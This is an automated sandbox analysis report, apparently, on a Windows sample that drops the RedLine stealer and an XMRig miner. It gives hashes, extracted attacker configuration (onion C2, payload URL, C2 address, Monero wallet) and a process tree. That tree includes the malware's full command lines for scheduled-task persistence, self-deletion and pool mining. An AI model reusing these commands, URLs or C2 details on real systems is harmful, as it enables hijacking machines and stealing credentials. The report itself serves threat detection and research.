Analysis
max time kernel: 150s
max time network: 153s
platform: windows10-2004_x64
resource: win10v2004-20220901-en
resource tags: arch:x64 arch:x86 image:win10v2004-20220901-en locale:en-us os:windows10-2004-x64 system
submitted: 04/09/2022, 08:45
Static task: static1
Behavioral task: behavioral1
  Sample: 3b59592dcd363e939110c500f86d2b2fa9e9eb53403e3f9c321eec47055ef20a.exe
  Resource: win7-20220812-en
Behavioral task: behavioral2
  Sample: 3b59592dcd363e939110c500f86d2b2fa9e9eb53403e3f9c321eec47055ef20a.exe
  Resource: win10v2004-20220901-en
General
Target: 3b59592dcd363e939110c500f86d2b2fa9e9eb53403e3f9c321eec47055ef20a.exe
Size: 290KB
MD5: 55eb02184d72de2ac95eecbb59b13e4c
SHA1: 7aab5d8e68baa28308eb765e27f1994d0f5796b4
SHA256: 3b59592dcd363e939110c500f86d2b2fa9e9eb53403e3f9c321eec47055ef20a
SHA512: 15a29cd782032b6533f5f19863507e763762bb0c3504fec8cc5879e5008d3872eefb90b51ff9eebf4fe2bb85133f0cc110ee63d68c65d6068a56b330c3afdff9
SSDEEP: 3072:Io8b6DOdeGw1voLP7yIJ8p2tijs9YFd1aUiLcI0Mv4J:I6oy3oIjDFd1aR
Malware Config
Extracted: eternity
  http://rlcjba7wduej3xcstcjo577eqgjsjvcjfsw4i23fqvf2y27ylylhmhad.onion
  45coZygmFLnRF5NY7Uz51tadci9wak52fbbhfgKR5q5BTB9QbKMiCnXiPiiwCwyUTQeF4nZD5mdAugj8yB5hTLA9ViAFFR8
  payload_urls: http://rlcjba7wduej3xcstcjo577eqgjsjvcjfsw4i23fqvf2y27ylylhmhad.onion.pet/shared/xmrig.exe
Extracted: redline
  installs-49
  94.140.112.157:29329
  auth_value: f137ab12b29192785aff1f9a524f0090
Signatures
Detects Smokeloader packer 1 IoCs
  resource: behavioral2/memory/3068-133-0x0000000002E00000-0x0000000002E09000-memory.dmp; yara_rule: family_smokeloader
Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
SmokeLoader
Modular backdoor trojan in use since 2014.
XMRig Miner payload 2 IoCs
  resource: behavioral2/files/0x0003000000022da6-197.dat; yara_rule: xmrig
  resource: behavioral2/files/0x0003000000022da6-198.dat; yara_rule: xmrig
Downloads MZ/PE file
Executes dropped EXE 7 IoCs
  pid: 4868; Process: 6542.exe
  pid: 1492; Process: Miner.exe
  pid: 884; Process: installs49.exe
  pid: 344; Process: Miner.exe
  pid: 1788; Process: Miner.exe
  pid: 5092; Process: Admin_IYMUGYHL.exe
  pid: 3500; Process: Miner.exe
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
  description: Key value queried; ioc: \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation; Process: 6542.exe
  description: Key value queried; ioc: \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation; Process: Miner.exe
  description: Key value queried; ioc: \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation; Process: Miner.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Legitimate hosting services abused for malware hosting/C2 1 TTPs
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Program crash 1 IoCs
  pid: 2592; pid_target: 4868; Process: WerFault.exe; procid_target: 78
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
  description: Key opened; ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI; Process: 3b59592dcd363e939110c500f86d2b2fa9e9eb53403e3f9c321eec47055ef20a.exe
  description: Key queried; ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI; Process: 3b59592dcd363e939110c500f86d2b2fa9e9eb53403e3f9c321eec47055ef20a.exe
  description: Key enumerated; ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI; Process: 3b59592dcd363e939110c500f86d2b2fa9e9eb53403e3f9c321eec47055ef20a.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid: 4020; Process: schtasks.exe
Runs ping.exe 1 TTPs 1 IoCs
  pid: 520; Process: PING.EXE
Suspicious behavior: EnumeratesProcesses 64 IoCs
  pid: 3068; Process: 3b59592dcd363e939110c500f86d2b2fa9e9eb53403e3f9c321eec47055ef20a.exe (2 identical entries)
  pid: 2056; Process: Process not Found (the remaining 62 entries, all identical)
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  pid: 2056; Process: Process not Found
Suspicious behavior: LoadsDriver 1 IoCs
  pid: 660; Process: Process not Found
Suspicious behavior: MapViewOfSection 1 IoCs
  pid: 3068; Process: 3b59592dcd363e939110c500f86d2b2fa9e9eb53403e3f9c321eec47055ef20a.exe
Suspicious use of AdjustPrivilegeToken 23 IoCs
  Token: SeShutdownPrivilege; pid: 2056; Process: Process not Found
  Token: SeCreatePagefilePrivilege; pid: 2056; Process: Process not Found
  Token: SeShutdownPrivilege; pid: 2056; Process: Process not Found
  Token: SeCreatePagefilePrivilege; pid: 2056; Process: Process not Found
  Token: SeDebugPrivilege; pid: 4868; Process: 6542.exe
  Token: SeShutdownPrivilege; pid: 2056; Process: Process not Found
  Token: SeCreatePagefilePrivilege; pid: 2056; Process: Process not Found
  Token: SeShutdownPrivilege; pid: 2056; Process: Process not Found
  Token: SeCreatePagefilePrivilege; pid: 2056; Process: Process not Found
  Token: SeDebugPrivilege; pid: 344; Process: Miner.exe
  Token: SeDebugPrivilege; pid: 884; Process: installs49.exe
  Token: SeLockMemoryPrivilege; pid: 5092; Process: Admin_IYMUGYHL.exe
  Token: SeLockMemoryPrivilege; pid: 5092; Process: Admin_IYMUGYHL.exe
  Token: SeShutdownPrivilege; pid: 2056; Process: Process not Found
  Token: SeCreatePagefilePrivilege; pid: 2056; Process: Process not Found
  Token: SeShutdownPrivilege; pid: 2056; Process: Process not Found
  Token: SeCreatePagefilePrivilege; pid: 2056; Process: Process not Found
  Token: SeShutdownPrivilege; pid: 2056; Process: Process not Found
  Token: SeCreatePagefilePrivilege; pid: 2056; Process: Process not Found
  Token: SeShutdownPrivilege; pid: 2056; Process: Process not Found
  Token: SeCreatePagefilePrivilege; pid: 2056; Process: Process not Found
  Token: SeShutdownPrivilege; pid: 2056; Process: Process not Found
  Token: SeCreatePagefilePrivilege; pid: 2056; Process: Process not Found
Suspicious use of WriteProcessMemory 26 IoCs
  PID 2056 wrote to memory of 4868; Process: Process not Found; procid_target: 78 (3 identical entries)
  PID 4868 wrote to memory of 1492; Process: 6542.exe; procid_target: 79 (3 identical entries)
  PID 1492 wrote to memory of 4160; Process: Miner.exe; procid_target: 81 (3 identical entries)
  PID 4160 wrote to memory of 2344; Process: cmd.exe; procid_target: 83 (3 identical entries)
  PID 4160 wrote to memory of 520; Process: cmd.exe; procid_target: 84 (3 identical entries)
  PID 4868 wrote to memory of 884; Process: 6542.exe; procid_target: 85 (3 identical entries)
  PID 4160 wrote to memory of 4020; Process: cmd.exe; procid_target: 89 (3 identical entries)
  PID 4160 wrote to memory of 344; Process: cmd.exe; procid_target: 90 (3 identical entries)
  PID 344 wrote to memory of 5092; Process: Miner.exe; procid_target: 92 (2 identical entries)
Processes
(indentation shows the parent/child nesting of the process tree)

Image: C:\Users\Admin\AppData\Local\Temp\3b59592dcd363e939110c500f86d2b2fa9e9eb53403e3f9c321eec47055ef20a.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\3b59592dcd363e939110c500f86d2b2fa9e9eb53403e3f9c321eec47055ef20a.exe"
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
PID: 3068

Image: C:\Users\Admin\AppData\Local\Temp\6542.exe
Command line: C:\Users\Admin\AppData\Local\Temp\6542.exe
  - Executes dropped EXE
  - Checks computer location settings
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
PID: 4868

    Image: C:\Users\Admin\AppData\Local\Temp\Miner.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Miner.exe"
      - Executes dropped EXE
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory
    PID: 1492

        Image: C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "Miner" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Miner.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe"
          - Suspicious use of WriteProcessMemory
        PID: 4160

            Image: C:\Windows\SysWOW64\chcp.com
            Command line: chcp 65001
            PID: 2344

            Image: C:\Windows\SysWOW64\PING.EXE
            Command line: ping 127.0.0.1
              - Runs ping.exe
            PID: 520

            Image: C:\Windows\SysWOW64\schtasks.exe
            Command line: schtasks /create /tn "Miner" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe" /rl HIGHEST /f
              - Creates scheduled task(s)
            PID: 4020

            Image: C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe
            Command line: "C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe"
              - Executes dropped EXE
              - Checks computer location settings
              - Suspicious use of AdjustPrivilegeToken
              - Suspicious use of WriteProcessMemory
            PID: 344

                Image: C:\Users\Admin\AppData\Local\Temp\Admin_IYMUGYHL.exe
                Command line: "C:\Users\Admin\AppData\Local\Temp\Admin_IYMUGYHL.exe" -a cryptonight -o pool.supportxmr.com:3333 -u 45coZygmFLnRF5NY7Uz51tadci9wak52fbbhfgKR5q5BTB9QbKMiCnXiPiiwCwyUTQeF4nZD5mdAugj8yB5hTLA9ViAFFR8.Admin_IYMUGYHL -p --max-cpu-usage=40 --donate-level=1
                  - Executes dropped EXE
                  - Suspicious use of AdjustPrivilegeToken
                PID: 5092

    Image: C:\Users\Admin\AppData\Local\Temp\installs49.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\installs49.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
    PID: 884

    Image: C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4868 -s 1256
      - Program crash
    PID: 2592

Image: C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4868 -ip 4868
PID: 4612

Image: C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe
Command line: C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe
  - Executes dropped EXE
PID: 1788

Image: C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe
Command line: C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe
  - Executes dropped EXE
PID: 3500
Network
MITRE ATT&CK Enterprise v6
Downloads